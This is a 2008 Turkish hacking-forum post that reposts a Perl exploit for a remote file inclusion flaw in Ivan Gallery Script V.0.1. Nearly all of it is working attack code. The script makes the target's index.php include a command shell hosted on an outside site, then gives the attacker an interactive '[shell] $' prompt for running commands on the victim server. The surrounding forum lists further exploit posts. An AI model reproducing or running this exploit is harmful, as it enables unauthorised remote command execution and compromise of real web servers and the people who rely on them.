Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
AnasayfaAnasayfa  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

 

 Ivan Gallery Script V.0.1 (index.php) Remote File Include Ex

Aşağa gitmek 
YazarMesaj
hacked
MASTER
MASTER
hacked


Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08

Ivan Gallery Script V.0.1 (index.php) Remote File Include Ex Empty
MesajKonu: Ivan Gallery Script V.0.1 (index.php) Remote File Include Ex   Ivan Gallery Script V.0.1 (index.php) Remote File Include Ex EmptySalı Mart 11, 2008 12:06 am

Kaynak : http://www.securityfocus.com/archive...30/90/threaded

kod,:

#!/usr/bin/perl
#
#Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit
#
#Coded by SekoMirza & HypNosis
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: Sh4dowM4n , PhanTOmOrhcid , Starhack.0rg , CaRaMeL , MBrain! , and all Turkishz Hackerzz
#
#Vulnerable Code: include($dir.'/gallery.inc.php'); in /index.php
#
#Vendor: http://d.turboupload.com/de/1718382/r40k9auhmy.html

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'index.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

{
$finreturn = $1;
$finreturn=~ tr/[....]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}

else {print "[shell] \$";}}}last;

sub head()
{
print "\n=====================================================================
=======\r\n";
print " *Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit*\r\n";
print "=======================================================================
=====\r\n";
}
sub usage()
{
head();
print " Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
print " <Site> - Full path to MXShotcast ex: http://www.site.com/ \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "=======================================================================
=====\r\n";
print " Bug Found by Sek0MirZa \r\n";
print " www.starhack.org \r\n";
print "=======================================================================
=====\r\n";
exit();
}
Sayfa başına dön Aşağa gitmek
 
Ivan Gallery Script V.0.1 (index.php) Remote File Include Ex
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» GPB bulletin board Remote file include
» Extreme PHPBB2 Remote File Inclusion
» Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
» phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerabi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: Exploitler-
Buraya geçin: